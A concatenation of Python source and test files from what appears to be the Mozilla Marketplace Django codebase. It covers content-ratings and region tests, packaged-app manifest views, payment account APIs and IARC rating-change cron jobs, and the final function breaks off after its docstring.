        platforms = PAID_PLATFORMS(request=RequestFactory(),
                                   is_packaged=True)
        expected = (
            ('paid-firefoxos', _('Firefox OS')),
            ('paid-android-mobile', _('Firefox Mobile')),
            ('paid-android-tablet', _('Firefox Tablet')),
        )
        eq_(platforms, expected)
########NEW FILE########
__FILENAME__ = test_ratingsbodies
from contextlib import contextmanager
from nose.tools import eq_
from tower import activate
import amo.tests
import mkt.constants.ratingsbodies as ratingsbodies
class TestRatingsBodies(amo.tests.TestCase):
    """Tests for ratingsbodies helpers, with and without the 'iarc' switch
    that gates the full set of ratings bodies."""

    def test_all_ratings_waffle_off(self):
        ratings = ratingsbodies.ALL_RATINGS()
        # Assert only CLASSIND and GENERIC ratings are present.
        assert ratingsbodies.CLASSIND_L in ratings
        assert ratingsbodies.GENERIC_3 in ratings
        assert ratingsbodies.ESRB_E not in ratings
        assert ratingsbodies.PEGI_3 not in ratings
        assert ratingsbodies.USK_0 not in ratings

    def test_all_ratings_waffle_on(self):
        self.create_switch('iarc')
        ratings = ratingsbodies.ALL_RATINGS()
        # Assert all ratings bodies are present.
        assert ratingsbodies.CLASSIND_L in ratings
        assert ratingsbodies.GENERIC_3 in ratings
        assert ratingsbodies.ESRB_E in ratings
        assert ratingsbodies.PEGI_3 in ratings
        assert ratingsbodies.USK_0 in ratings

    def test_ratings_by_name_waffle(self):
        without_waffle = ratingsbodies.RATINGS_BY_NAME()
        self.create_switch('iarc', db=True)
        with_waffle = ratingsbodies.RATINGS_BY_NAME()
        # Test waffle off excludes ratings.
        assert len(without_waffle) < len(with_waffle)

    def test_ratings_by_name_lazy_translation(self):
        # Index 6 corresponds to the GENERIC 3+ choice.
        generic_3_choice = ratingsbodies.RATINGS_BY_NAME()[6]
        eq_(generic_3_choice[1], 'Generic - For ages 3+')

    def test_ratings_has_ratingsbody(self):
        eq_(ratingsbodies.GENERIC_3.ratingsbody, ratingsbodies.GENERIC)
        eq_(ratingsbodies.CLASSIND_L.ratingsbody, ratingsbodies.CLASSIND)
        eq_(ratingsbodies.ESRB_E.ratingsbody, ratingsbodies.ESRB)
        eq_(ratingsbodies.USK_0.ratingsbody, ratingsbodies.USK)
        eq_(ratingsbodies.PEGI_3.ratingsbody, ratingsbodies.PEGI)

    def test_dehydrate_rating(self):
        # Dehydrated ratings must have a translated name and a real label.
        self.create_switch('iarc')
        for rating in ratingsbodies.ALL_RATINGS():
            rating = ratingsbodies.dehydrate_rating(rating)
            assert isinstance(rating.name, unicode), rating
            assert rating.label and rating.label != str(None), rating

    def test_dehydrate_ratings_body(self):
        self.create_switch('iarc')
        for k, body in ratingsbodies.RATINGS_BODIES.iteritems():
            body = ratingsbodies.dehydrate_ratings_body(body)
            assert isinstance(body.name, unicode)
            assert body.label and body.label != str(None)
            assert isinstance(body.description, unicode)

    @contextmanager
    def tower_activate(self, region):
        # Temporarily switch the active locale, always restoring en-US.
        try:
            activate(region)
            yield
        finally:
            activate('en-US')

    def test_dehydrate_rating_language(self):
        # dehydrate_rating() should follow the active locale.
        self.create_switch('iarc')
        with self.tower_activate('es'):
            rating = ratingsbodies.dehydrate_rating(ratingsbodies.ESRB_T)
            eq_(rating.name, 'Adolescente')
        with self.tower_activate('fr'):
            rating = ratingsbodies.dehydrate_rating(ratingsbodies.ESRB_T)
            eq_(rating.name, 'Adolescents')
        rating = ratingsbodies.dehydrate_rating(ratingsbodies.ESRB_T)
        eq_(rating.name, 'Teen')
########NEW FILE########
__FILENAME__ = test_regions
from contextlib import contextmanager
from django.utils import translation
from nose.tools import eq_, ok_
from tower import activate
import amo.tests
import mkt.constants.regions as regions
class TestRegionContentRatings(amo.tests.TestCase):
    """Tests for region -> ratings-body mapping and localised sorting of
    region choices."""

    @contextmanager
    def tower_activate(self, region):
        # Temporarily switch the active locale, always restoring en-US.
        try:
            activate(region)
            yield
        finally:
            activate('en-US')

    def test_region_to_ratings_body(self):
        # Without the 'iarc' switch, only BR and DE require ratings.
        region_to_body = regions.REGION_TO_RATINGS_BODY()
        eq_(len(region_to_body), 2)
        eq_(region_to_body['br'], 'classind')
        eq_(region_to_body['de'], 'generic')

    def test_region_to_ratings_body_switch(self):
        self.create_switch('iarc')
        region_to_body = regions.REGION_TO_RATINGS_BODY()
        eq_(region_to_body['br'], 'classind')
        eq_(region_to_body['es'], 'pegi')
        eq_(region_to_body['de'], 'usk')
        eq_(region_to_body['us'], 'esrb')

    def test_name_sorted_regions_eq_slug_sorted_regions(self):
        """Check data is the same, irrespective of ordering."""
        self.assertEqual(len(regions.REGIONS_CHOICES_NAME),
                         len(regions.REGIONS_CHOICES_SORTED_BY_NAME()))
        self.assertSetEqual(regions.REGIONS_CHOICES_NAME,
                            regions.REGIONS_CHOICES_SORTED_BY_NAME())

    def test_rest_of_world_last_regions_by_slug(self):
        eq_(regions.REGIONS_CHOICES_NAME[-1][1], regions.RESTOFWORLD.name)

    def test_rest_of_world_last_regions_by_name(self):
        eq_(regions.REGIONS_CHOICES_SORTED_BY_NAME()[-1][1],
            regions.RESTOFWORLD.name)

    def test_localized_sorting_of_region_choices_pl(self):
        # Sorting must respect the active (Polish) locale's collation.
        with self.tower_activate('pl'):
            region_names_pl = [r[1] for r in
                               regions.REGIONS_CHOICES_SORTED_BY_NAME()]
            ok_(region_names_pl.index(regions.SPAIN.name) <
                region_names_pl.index(regions.UK.name))
            ok_(region_names_pl.index(regions.UK.name) >
                region_names_pl.index(regions.US.name))

    def test_localized_sorting_of_region_choices_fr(self):
        # And the French locale's collation.
        with self.tower_activate('fr'):
            region_names_fr = [unicode(r[1]) for r in
                               regions.REGIONS_CHOICES_SORTED_BY_NAME()]
            ok_(region_names_fr.index(regions.SPAIN.name) <
                region_names_fr.index(regions.US.name))
            ok_(region_names_fr.index(regions.US.name) <
                region_names_fr.index(regions.UK.name))
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import patterns, url
from mkt.darjeeling.views import DarjeelingAppList
# Single endpoint consumed by the Darjeeling frontend for its app list.
urlpatterns = patterns('',
    url(r'^darjeeling/list/',
        DarjeelingAppList.as_view(),
        name='darjeeling-list'),
)
########NEW FILE########
__FILENAME__ = views
from rest_framework.generics import ListAPIView
from rest_framework.response import Response
from rest_framework.serializers import SerializerMethodField
from mkt.api.base import CORSMixin, MarketplaceView
from mkt.collections.models import Collection
from mkt.fireplace.serializers import (FireplaceCollectionMembershipField,
FireplaceESAppSerializer)
class FakeCollection(object):
    """Lightweight stand-in for a Collection when only its pk is needed
    (see DarjeelingAppList.get_collection)."""

    def __init__(self, pk):
        # Only the primary key is ever read by the membership field.
        self.pk = pk
class DarjeelingESAppSerializer(FireplaceESAppSerializer):
    """Fireplace ES app serializer plus a `featured` boolean field."""
    featured = SerializerMethodField('is_featured')

    class Meta(FireplaceESAppSerializer.Meta):
        # Extend the parent's field list with 'featured' (kept sorted).
        fields = sorted(FireplaceESAppSerializer.Meta.fields + ['featured'])
        exclude = FireplaceESAppSerializer.Meta.exclude

    def is_featured(self, obj):
        # The view stores the featured collection's pk in the serializer
        # context; an app is featured when it belongs to that collection.
        collections = [c['id'] for c in obj.es_data.get('collection', [])]
        return self.context['featured_pk'] in collections
class DarjeelingCollectionMembershipField(FireplaceCollectionMembershipField):
    """Membership field that serializes ES apps with the Darjeeling
    serializer (adds the `featured` flag)."""
    app_serializer_classes = {
        'es': DarjeelingESAppSerializer,
    }
class DarjeelingAppList(CORSMixin, MarketplaceView, ListAPIView):
    """
    Endpoint that darjeeling client consumes to fetch its app list. The list is
    actually made of 2 things:
    - One collection called "darjeeling-apps" containing all apps;
    - One collection called "darjeeling-featured" containing all homepage apps.
    The first list is returned directly (without pagination) and since the
    second one is just supposed to be a subset of the first, only the app ids
    are returned.
    """
    cors_allowed_methods = ['get']
    # Fully public endpoint: no authentication or permission checks.
    authentication_classes = []
    permission_classes = []

    def get_collection(self, slug):
        """
        Return a Fake Collection object with only the pk, for use with
        CollectionMembershipField. We can't simply do a Collection.objects.only
        query, because transforms get in the way (no_transforms doesn't remove
        translations atm)
        """
        pk = Collection.objects.filter(slug=slug).values_list('pk', flat=True)
        # NOTE(review): raises IndexError if the collection is missing --
        # presumably both collections are guaranteed to exist; confirm.
        return FakeCollection(pk[0])

    def get_queryset(self):
        """
        Fetch (and directly serialize using fireplace serializer) all apps
        belonging to the 'all' collection by querying ES.
        """
        collection_all = self.get_collection('darjeeling-apps')
        membership = DarjeelingCollectionMembershipField(many=True)
        # Hand the serializer context over so nested app serialization sees
        # the same request; flag ES usage and stash the featured pk for
        # DarjeelingESAppSerializer.is_featured().
        membership.context = self.get_serializer_context()
        membership.context['use-es-for-apps'] = True
        membership.context['featured_pk'] = (
            self.get_collection('darjeeling-featured').pk)
        return membership.field_to_native_es(collection_all, self.request)

    def list(self, request, *args, **kwargs):
        # 'all': full serialized app list; 'featured': just the ids of the
        # subset flagged as featured during serialization.
        data = {}
        data['all'] = self.get_queryset()
        data['featured'] = [d['id'] for d in data['all'] if d['featured']]
        return Response(data)
########NEW FILE########
__FILENAME__ = helpers
from jingo import env, register
import jinja2
from tower import ungettext as ngettext
from amo.helpers import numberfmt
from constants.applications import DEVICE_TYPES
@register.function
def device_list(product):
    """Render the device-compatibility list template for `product`.

    Returns None (renders nothing) when the product has no device types.
    """
    device_types = product.device_types
    if device_types:
        t = env.get_template('detail/helpers/device_list.html')
        return jinja2.Markup(t.render({
            'device_types': device_types,
            'all_device_types': DEVICE_TYPES.values()}))
@register.filter
def weekly_downloads(product):
    """Return a localised, pluralised '{n} weekly downloads' string."""
    cnt = product.weekly_downloads
    # ngettext picks the singular/plural form; numberfmt localises the count.
    return ngettext('{0} weekly download', '{0} weekly downloads',
                    cnt).format(numberfmt(cnt))
########NEW FILE########
__FILENAME__ = test_views
# -*- coding: utf-8 -*-
import hashlib
import json
import zipfile
from django.core.files.storage import default_storage as storage
import mock
from nose.tools import eq_
import amo
import amo.tests
from mkt.webapps.models import Webapp
from mkt.site.fixtures import fixture
class TestPackagedManifest(amo.tests.TestCase):
    """Tests for the packaged-app mini-manifest view: availability rules,
    ETag generation and conditional GET handling."""
    fixtures = ['base/users'] + fixture('webapp_337141')

    def setUp(self):
        self.app = Webapp.objects.get(pk=337141)
        self.app.update(is_packaged=True)
        # Create a fake package to go along with the app.
        latest_file = self.app.get_latest_file()
        with storage.open(latest_file.file_path,
                          mode='w') as package:
            test_package = zipfile.ZipFile(package, 'w')
            test_package.writestr('manifest.webapp', 'foobar')
            test_package.close()
        latest_file.update(hash=latest_file.generate_hash())
        self.url = self.app.get_manifest_url()

    def tearDown(self):
        # Remove the fake package written in setUp.
        storage.delete(self.app.get_latest_file().file_path)

    def get_digest_from_manifest(self, manifest=None):
        # Mirror the view's ETag computation: sha256 over the minifest
        # content followed by the package file's hash.
        if manifest is None:
            manifest = self._mocked_json()
        elif not isinstance(manifest, (str, unicode)):
            manifest = json.dumps(manifest)
        hash_ = hashlib.sha256()
        hash_.update(manifest)
        hash_.update(self.app.get_latest_file().hash)
        return hash_.hexdigest()

    def _mocked_json(self):
        # Canned minifest body used in place of get_cached_manifest().
        data = {
            u'name': u'Packaged App √',
            u'version': u'1.0',
            u'size': 123456,
            u'release_notes': u'Bug fixes',
            u'packaged_path': u'/path/to/file.zip',
        }
        return json.dumps(data)

    def login_as_reviewer(self):
        self.client.logout()
        assert self.client.login(username='[email protected]',
                                 password='password')

    def login_as_author(self):
        self.client.logout()
        user = self.app.authors.all()[0]
        self.app.addonuser_set.create(user=user)
        assert self.client.login(username=user.email, password='password')

    def test_non_packaged(self):
        # Hosted apps have no mini-manifest.
        self.app.update(is_packaged=False)
        res = self.client.get(self.url)
        eq_(res.status_code, 404)

    def test_disabled_by_user(self):
        self.app.update(disabled_by_user=True)
        res = self.client.get(self.url)
        eq_(res.status_code, 404)

    @mock.patch('mkt.webapps.models.Webapp.get_cached_manifest')
    def test_app_public(self, _mock):
        _mock.return_value = self._mocked_json()
        res = self.client.get(self.url)
        eq_(res.content, self._mocked_json())
        eq_(res['Content-Type'],
            'application/x-web-app-manifest+json; charset=utf-8')
        eq_(res['ETag'], '"%s"' % self.get_digest_from_manifest())

    @mock.patch('mkt.webapps.models.Webapp.get_cached_manifest')
    def test_etag_updates(self, _mock):
        # The ETag must change when the package contents change, even if
        # the minifest body stays identical.
        _mock.return_value = self._mocked_json()
        # Get the minifest with the first simulated package.
        res = self.client.get(self.url)
        eq_(res.content, self._mocked_json())
        eq_(res['Content-Type'],
            'application/x-web-app-manifest+json; charset=utf-8')
        first_etag = res['ETag']
        # Write a new value to the packaged app.
        latest_file = self.app.get_latest_file()
        with storage.open(latest_file.file_path,
                          mode='w') as package:
            test_package = zipfile.ZipFile(package, 'w')
            test_package.writestr('manifest.webapp', 'poop')
            test_package.close()
        latest_file.update(hash=latest_file.generate_hash())
        # Get the minifest with the second simulated package.
        res = self.client.get(self.url)
        eq_(res.content, self._mocked_json())
        eq_(res['Content-Type'],
            'application/x-web-app-manifest+json; charset=utf-8')
        second_etag = res['ETag']
        self.assertNotEqual(first_etag, second_etag)

    @mock.patch('mkt.webapps.models.Webapp.get_cached_manifest')
    def test_conditional_get(self, _mock):
        # A matching If-None-Match must yield an empty 304.
        _mock.return_value = self._mocked_json()
        etag = self.get_digest_from_manifest()
        res = self.client.get(self.url, HTTP_IF_NONE_MATCH='%s' % etag)
        eq_(res.content, '')
        eq_(res.status_code, 304)

    def test_app_pending(self):
        # Pending apps are not available -- not even to reviewers/authors
        # (see the two tests below).
        self.app.update(status=amo.STATUS_PENDING)
        res = self.client.get(self.url)
        eq_(res.status_code, 404)

    def test_app_pending_reviewer(self):
        self.login_as_reviewer()
        self.app.update(status=amo.STATUS_PENDING)
        res = self.client.get(self.url)
        eq_(res.status_code, 404)

    def test_app_pending_author(self):
        self.login_as_author()
        self.app.update(status=amo.STATUS_PENDING)
        res = self.client.get(self.url)
        eq_(res.status_code, 404)

    @mock.patch('mkt.webapps.models.Webapp.get_cached_manifest')
    def test_logged_out(self, _mock):
        # The minifest is public: anonymous requests succeed.
        _mock.return_value = self._mocked_json()
        self.client.logout()
        res = self.client.get(self.url)
        eq_(res.status_code, 200)
        eq_(res['Content-type'],
            'application/x-web-app-manifest+json; charset=utf-8')
########NEW FILE########
__FILENAME__ = urls
from django.conf.urls import include, patterns, url
from django.http import HttpResponse
from mkt.purchase.urls import app_purchase_patterns
from mkt.receipts.urls import app_receipt_patterns
from . import views
# Stub view: accepts anything and returns an empty 200 response.
DummyResponse = lambda *args, **kw: HttpResponse()

urlpatterns = patterns('',
    # Merge app purchase / receipt patterns.
    ('^purchase/', include(app_purchase_patterns)),
    ('^purchase/', include(app_receipt_patterns)),
    url('^activity/', views.app_activity, name='detail.app_activity'),
)
########NEW FILE########
__FILENAME__ = views
import hashlib
from django import http
from django.shortcuts import get_object_or_404, render
from django.views.decorators.http import etag
import commonware.log
import amo
from addons.decorators import addon_view_factory
from amo.decorators import login_required, permission_required
from amo.utils import paginate
from devhub.models import ActivityLog
from mkt.webapps.models import Webapp
log = commonware.log.getLogger('z.detail')

# View decorators resolving the webapp from the URL: `valid` queryset for
# public-facing views, `all` for views that must also see non-public apps.
addon_view = addon_view_factory(qs=Webapp.objects.valid)
addon_all_view = addon_view_factory(qs=Webapp.objects.all)
def manifest(request, uuid):
    """Returns the "mini" manifest for packaged apps.
    If not a packaged app, returns a 404.
    """
    addon = get_object_or_404(Webapp, guid=uuid, is_packaged=True)
    # NOTE(review): BLOCKED apps are treated as available here -- presumably
    # so already-installed apps can still fetch the manifest; confirm.
    is_avail = addon.status in [amo.STATUS_PUBLIC, amo.STATUS_BLOCKED]
    # The ETag covers the minifest body AND the package file's hash, so it
    # changes whenever either one does.
    package_etag = hashlib.sha256()
    if not addon.is_packaged or addon.disabled_by_user or not is_avail:
        raise http.Http404
    else:
        manifest_content = addon.get_cached_manifest()
        package_etag.update(manifest_content)
        if addon.is_packaged:
            # Update the hash with the content of the package itself.
            package_file = addon.get_latest_file()
            if package_file:
                package_etag.update(package_file.hash)
    manifest_etag = package_etag.hexdigest()

    # Wrap the response in Django's @etag decorator so conditional GETs
    # (If-None-Match) are answered with a 304 automatically.
    @etag(lambda r, a: manifest_etag)
    def _inner_view(request, addon):
        response = http.HttpResponse(
            manifest_content,
            content_type='application/x-web-app-manifest+json; charset=utf-8')
        return response
    return _inner_view(request, addon)
@login_required
@permission_required('AccountLookup', 'View')
@addon_all_view
def app_activity(request, addon):
    """Shows the app activity age for single app."""
    # Split the activity log into developer-visible and admin-only entries.
    user_items = ActivityLog.objects.for_apps([addon]).exclude(
        action__in=amo.LOG_HIDE_DEVELOPER)
    admin_items = ActivityLog.objects.for_apps([addon]).filter(
        action__in=amo.LOG_HIDE_DEVELOPER)
    # Paginate both lists independently, 20 entries per page.
    user_items = paginate(request, user_items, per_page=20)
    admin_items = paginate(request, admin_items, per_page=20)
    return render(request, 'detail/app_activity.html',
                  {'admin_items': admin_items, 'product': addon,
                   'user_items': user_items})
########NEW FILE########
__FILENAME__ = api_payments
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
import commonware
from curling.lib import HttpClientError, HttpServerError
from rest_framework import status
from rest_framework.mixins import (CreateModelMixin, DestroyModelMixin,
ListModelMixin, RetrieveModelMixin,
UpdateModelMixin)
from rest_framework.permissions import BasePermission, IsAuthenticated
from rest_framework.relations import HyperlinkedRelatedField
from rest_framework.response import Response
from rest_framework.serializers import (HyperlinkedModelSerializer,
Serializer,
ValidationError)
from rest_framework.viewsets import GenericViewSet
from tower import ugettext as _
import amo
from addons.models import AddonUpsell
from constants.payments import PROVIDER_BANGO
from mkt.api.authorization import (AllowAppOwner, GroupPermission,
switch)
from mkt.api.authentication import (RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.base import MarketplaceView
from mkt.constants.payments import PAYMENT_STATUSES
from mkt.developers.forms_payments import (BangoPaymentAccountForm,
PaymentCheckForm)
from mkt.developers.models import (AddonPaymentAccount, CantCancel,
PaymentAccount)
from mkt.developers.providers import get_provider
from lib.pay_server import get_client
log = commonware.log.getLogger('z.api.payments')
class PaymentAppViewSet(GenericViewSet):
    """Base ViewSet that resolves the app referenced by the URL `pk` into
    `self.app` via a form declared on the subclass."""

    def initialize_request(self, request, *args, **kwargs):
        """
        Pass the value in the URL through to the form defined on the
        ViewSet, which will populate the app property with the app object.
        You must define a form which will take an app object.
        """
        request = (super(PaymentAppViewSet, self)
                   .initialize_request(request, *args, **kwargs))
        # Stays None when the form rejects the pk (missing/invalid app).
        self.app = None
        form = self.form({'app': kwargs.get('pk')})
        if form.is_valid():
            self.app = form.cleaned_data['app']
        return request
class PaymentAccountSerializer(Serializer):
    """
    Fake serializer that returns PaymentAccount details when
    serializing a PaymentAccount instance. Use only for read operations.
    """

    def to_native(self, obj):
        # Delegate to the payment provider for the account's details, then
        # add the API URI of this account.
        data = obj.get_provider().account_retrieve(obj)
        data['resource_uri'] = reverse('payment-account-detail',
                                       kwargs={'pk': obj.pk})
        return data
class PaymentAccountViewSet(ListModelMixin, RetrieveModelMixin,
MarketplaceView, GenericViewSet):
queryset = PaymentAccount.objects.all()
# PaymentAccountSerializer is not a real serializer, it just looks up
# the details on the object. It's only used for GET requests, in every
# other case we use BangoPaymentAccountForm directly.
serializer_class = PaymentAccountSerializer
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication]
# Security checks are performed in get_queryset(), so we allow any
# authenticated users by default.
permission_classes = [IsAuthenticated]
def get_queryset(self):
"""
Return the queryset specific to the user using the view. (This replaces
permission checks, unauthorized users won't be able to see that an
account they don't have access to exists, we'll return 404 for them.)
"""
qs = super(PaymentAccountViewSet, self).get_queryset()
return qs.filter(user=self.request.amo_user, inactive=False)
def create(self, request, *args, **kwargs):
provider = get_provider()
form = provider.forms['account'](request.DATA)
if form.is_valid():
try:
provider = get_provider()
obj = provider.account_create(request.amo_user, form.data)
except HttpClientError as e:
log.error('Client error creating Bango account; %s' % e)
return Response(e.content,
status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except HttpServerError as e:
log.error('Error creating Bango payment account; %s' % e)
return Response(_(u'Could not connect to payment server.'),
status=status.HTTP_500_INTERNAL_SERVER_ERROR)
serializer = self.get_serializer(obj)
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(form.errors, status=status.HTTP_400_BAD_REQUEST)
def partial_update(self, request, *args, **kwargs):
return Response(status=status.HTTP_405_METHOD_NOT_ALLOWED)
def update(self, request, *args, **kwargs):
self.object = self.get_object()
form = BangoPaymentAccountForm(request.DATA, account=True)
if form.is_valid():
self.object.get_provider().account_update(self.object,
form.cleaned_data)
return Response(status=status.HTTP_204_NO_CONTENT)
return Response(form.errors, status=status.HTTP_400_BAD_REQUEST)
def destroy(self, request, *args, **kwargs):
    """Cancel the payment account; 409 if it is shared and uncancellable."""
    account = self.get_object()
    try:
        # disable_refs=True also disables objects referencing this account.
        account.cancel(disable_refs=True)
    except CantCancel:
        return Response(_('Cannot delete shared account'),
                        status=status.HTTP_409_CONFLICT)
    log.info('Account cancelled: %s' % account.pk)
    return Response(status=status.HTTP_204_NO_CONTENT)
class UpsellSerializer(HyperlinkedModelSerializer):
    """Serializer for the free -> premium upsell link between two apps."""
    free = premium = HyperlinkedRelatedField(view_name='app-detail')

    class Meta:
        model = AddonUpsell
        fields = ('free', 'premium', 'created', 'modified', 'url')
        view_name = 'app-upsell-detail'

    def validate(self, attrs):
        # An upsell must point from a free app to a premium app.
        if attrs['free'].premium_type not in amo.ADDON_FREES:
            raise ValidationError('Upsell must be from a free app.')
        if attrs['premium'].premium_type in amo.ADDON_FREES:
            raise ValidationError('Upsell must be to a premium app.')
        return attrs
class UpsellPermission(BasePermission):
    """
    Permissions on the upsell object, is determined by permissions on the
    free and premium object.
    """
    def check(self, request, free, premium):
        # The requester must own every app involved; a missing (falsy)
        # app is skipped rather than denying access.
        owner = AllowAppOwner()
        return all(owner.has_object_permission(request, '', app)
                   for app in (free, premium) if app)

    def has_object_permission(self, request, view, object):
        return self.check(request, object.free, object.premium)
class UpsellViewSet(CreateModelMixin, DestroyModelMixin, RetrieveModelMixin,
                    UpdateModelMixin, MarketplaceView, GenericViewSet):
    """CRUD API (no list) for upsell relationships between apps."""
    # Gated behind the paid-submission waffle switch in addition to the
    # per-object ownership checks.
    permission_classes = (switch('allow-b2g-paid-submission'),
                          UpsellPermission,)
    queryset = AddonUpsell.objects.filter()
    serializer_class = UpsellSerializer

    def pre_save(self, obj):
        # Re-check ownership of both apps before any write.
        if not UpsellPermission().check(self.request, obj.free, obj.premium):
            raise PermissionDenied('Not allowed to alter that object')
class AddonPaymentAccountPermission(BasePermission):
    """
    Permissions on the app payment account object, is determined by
    permissions on the app the account is being used for.
    """
    def check(self, request, app, account):
        """Allow when the user owns the app AND the account is shared or
        belongs to the requesting user. Denials are logged."""
        if AllowAppOwner().has_object_permission(request, '', app):
            if account.shared or account.user.pk == request.amo_user.pk:
                return True
            else:
                # Bug fix: these messages used %(name)s placeholders with
                # str.format(dict), which never interpolates (the string
                # has no {} fields), so the ids were never logged. Use the
                # % operator, which %(name)s was written for.
                log.info('AddonPaymentAccount access %(account)s denied '
                         'for %(user)s: wrong user, not shared.' %
                         {'account': account.pk, 'user': request.amo_user.pk})
        else:
            log.info('AddonPaymentAccount access %(account)s denied '
                     'for %(user)s: no app permission.' %
                     {'account': account.pk, 'user': request.amo_user.pk})
        return False

    def has_object_permission(self, request, view, object):
        return self.check(request, object.addon, object.payment_account)
class AddonPaymentAccountSerializer(HyperlinkedModelSerializer):
    """Serializer linking an app to one of its payment accounts."""
    addon = HyperlinkedRelatedField(view_name='app-detail')
    payment_account = HyperlinkedRelatedField(
        view_name='payment-account-detail')

    class Meta:
        model = AddonPaymentAccount
        fields = ('addon', 'payment_account', 'created', 'modified', 'url')
        view_name = 'app-payment-account-detail'

    def validate(self, attrs):
        # Only premium apps can be attached to a payment account.
        if attrs['addon'].premium_type in amo.ADDON_FREES:
            raise ValidationError('App must be a premium app.')
        return attrs
class AddonPaymentAccountViewSet(CreateModelMixin, RetrieveModelMixin,
                                 UpdateModelMixin, MarketplaceView,
                                 GenericViewSet):
    """API to attach a payment account to an app (create/retrieve/update)."""
    permission_classes = (AddonPaymentAccountPermission,)
    queryset = AddonPaymentAccount.objects.filter()
    serializer_class = AddonPaymentAccountSerializer

    def pre_save(self, obj):
        # Re-check ownership of both the app and the account before saving.
        if not AddonPaymentAccountPermission().check(self.request,
                obj.addon, obj.payment_account):
            raise PermissionDenied('Not allowed to alter that object.')
        if self.request.method != 'POST':
            # On updates, re-read the stored row (bypassing cache) to make
            # sure the linked add-on is not being switched.
            addon = obj.__class__.objects.no_cache().get(pk=obj.pk).addon
            if not obj.addon == addon:
                # This should be a 400 error.
                raise PermissionDenied('Cannot change the add-on.')

    def post_save(self, obj, created=False):
        """Ensure that the setup_bango method is called after creation."""
        if created:
            # Create the corresponding product on the provider's side and
            # remember its URI.
            provider = get_provider()
            uri = provider.product_create(obj.payment_account, obj.addon)
            obj.product_uri = uri
            obj.save()
class PaymentCheckViewSet(PaymentAppViewSet):
    """Proxy endpoint asking solitude for an app's Bango payment status."""
    permission_classes = (AllowAppOwner,)
    form = PaymentCheckForm

    def create(self, request, *args, **kwargs):
        """
        We aren't actually creating objects, but proxying them
        through to solitude.
        """
        if not self.app:
            return Response('', status=400)

        self.check_object_permissions(request, self.app)
        client = get_client()

        res = client.api.bango.status.post(
            data={'seller_product_bango':
                  self.app.payment_account(PROVIDER_BANGO).account_uri})

        # Map solitude's raw status code onto our human-readable labels.
        filtered = {
            'bango': {
                'status': PAYMENT_STATUSES[res['status']],
                'errors': ''
            },
        }
        return Response(filtered, status=200)
class PaymentDebugViewSet(PaymentAppViewSet):
    """Staff-only proxy returning Bango debug info for an app from solitude."""
    permission_classes = [GroupPermission('Transaction', 'Debug')]
    form = PaymentCheckForm

    def list(self, request, *args, **kwargs):
        if not self.app:
            return Response('', status=400)

        client = get_client()
        res = client.api.bango.debug.get(
            data={'seller_product_bango':
                  self.app.payment_account(PROVIDER_BANGO).account_uri})
        # Expose only the bango portion of solitude's response.
        filtered = {
            'bango': res['bango'],
        }
        return Response(filtered, status=200)
########NEW FILE########
__FILENAME__ = cron
import datetime
import logging
import cronjobs
from celery.task.sets import TaskSet
from tower import ugettext as _
import amo
from amo.utils import chunked
from editors.models import RereviewQueue
import lib.iarc
from lib.iarc.utils import RATINGS_MAPPING
from mkt.developers.tasks import (refresh_iarc_ratings, region_email,
region_exclude)
from mkt.webapps.models import AddonExcludedRegion, Webapp
log = logging.getLogger('z.mkt.developers.cron')
def _region_email(ids, regions):
    """Fan out region_email tasks over the app ids, 100 ids per task."""
    subtasks = []
    for id_chunk in chunked(ids, 100):
        subtasks.append(region_email.subtask(args=[id_chunk, regions]))
    TaskSet(subtasks).apply_async()
@cronjobs.register
def send_new_region_emails(regions):
    """Email app developers notifying them of new regions added."""
    # Apps already explicitly excluded from any of these regions are
    # skipped; only apps opted in to new regions get the email.
    excluded = (AddonExcludedRegion.objects
                .filter(region__in=[r.id for r in regions])
                .values_list('addon', flat=True))
    ids = (Webapp.objects.exclude(id__in=excluded)
           .filter(enable_new_regions=True)
           .values_list('id', flat=True))
    _region_email(ids, regions)
def _region_exclude(ids, regions):
    """Fan out region_exclude tasks over the app ids, 100 ids per task."""
    subtasks = []
    for id_chunk in chunked(ids, 100):
        subtasks.append(region_exclude.subtask(args=[id_chunk, regions]))
    TaskSet(subtasks).apply_async()
@cronjobs.register
def exclude_new_region(regions):
    """
    Update regional blacklist based on a list of regions to exclude.
    """
    # Apps that already have an exclusion for one of these regions are
    # skipped; only apps NOT opted in to new regions get excluded.
    excluded = (AddonExcludedRegion.objects
                .filter(region__in=[r.id for r in regions])
                .values_list('addon', flat=True))
    ids = (Webapp.objects.exclude(id__in=excluded)
           .filter(enable_new_regions=False)
           .values_list('id', flat=True))
    _region_exclude(ids, regions)
@cronjobs.register
def process_iarc_changes(date=None):
    """
    Queries IARC for recent changes in the past 24 hours (or date provided).
    If date provided use it. It should be in the form YYYY-MM-DD.

    NOTE: Get_Rating_Changes only sends the diff of the changes
    by rating body. They only send data for the ratings bodies that
    changed.
    """
    if not date:
        date = datetime.date.today()
    else:
        date = datetime.datetime.strptime(date, '%Y-%m-%d').date()

    # Ask the IARC web service for all rating changes in the 24h window.
    client = lib.iarc.client.get_iarc_client('services')
    xml = lib.iarc.utils.render_xml('get_rating_changes.xml', {
        'date_from': date - datetime.timedelta(days=1),
        'date_to': date,
    })
    resp = client.Get_Rating_Changes(XMLString=xml)
    data = lib.iarc.utils.IARC_XML_Parser().parse_string(resp)

    for row in data.get('rows', []):
        iarc_id = row.get('submission_id')
        if not iarc_id:
            log.debug('IARC changes contained no submission ID: %s' % row)
            continue
        try:
            app = Webapp.objects.get(iarc_info__submission_id=iarc_id)
        except Webapp.DoesNotExist:
            log.debug('Could not find app associated with IARC submission ID: '
                      '%s' % iarc_id)
            continue
        try:
            # Fetch and save all IARC info.
            refresh_iarc_ratings([app.id])
            # Flag for rereview if it changed to adult.
            ratings_body = row.get('rating_system')
            rating = RATINGS_MAPPING[ratings_body].get(row['new_rating'])
            _flag_rereview_adult(app, ratings_body, rating)
            # Log change reason.
            reason = row.get('change_reason')
            amo.log(amo.LOG.CONTENT_RATING_CHANGED, app,
                    details={'comments': '%s:%s, %s' %
                             (ratings_body.name, rating.name, reason)})
        except Exception as e:
            # Any exceptions we catch, log, and keep going.
            # (Deliberate best-effort: one bad row must not abort the cron.)
            log.debug('Exception: %s' % e)
            continue
def _flag_rereview_adult(app, ratings_body, rating):
    """Flag app for rereview if it receives an Adult content rating."""
